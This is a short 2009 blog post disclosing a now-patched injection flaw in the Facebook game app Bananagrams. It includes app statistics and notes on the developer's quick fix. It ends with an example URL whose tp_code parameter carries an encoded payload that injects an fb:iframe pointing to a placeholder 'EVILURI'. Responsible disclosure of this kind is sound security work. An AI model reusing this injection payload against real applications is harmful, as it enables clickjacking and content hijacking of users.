FAXX Hack: Bananagrams

September 13th, 2009 | Author: | Tags: ,

Sorry for not posting yesterday – I’ll post another FAXX Hack in a bit to make up for it.

Facebook Verified Application

Current Monthly Active Users: 22,215

Current Rank on Application Leaderboard: 1,165

Application Developer: Large Animal Games

Responsiveness: LAG did not send any messages, but did patch the hole within a day or two. Actually, LAG was very responsive and moved swiftly to fix the holes, replying within minutes and posting a fix within hours. But for some reason, Gmail flagged the messages as spam and thus I didn’t notice them. My apologies to LAG, they did great work and I appreciate it!

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/bananagrams/invite.php?tp_code=%22%2F%3E%3Cfb%3Aiframe+src%3D%22EVILURI%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

Be Sociable, Share!
Leave a comment
Comments are closed.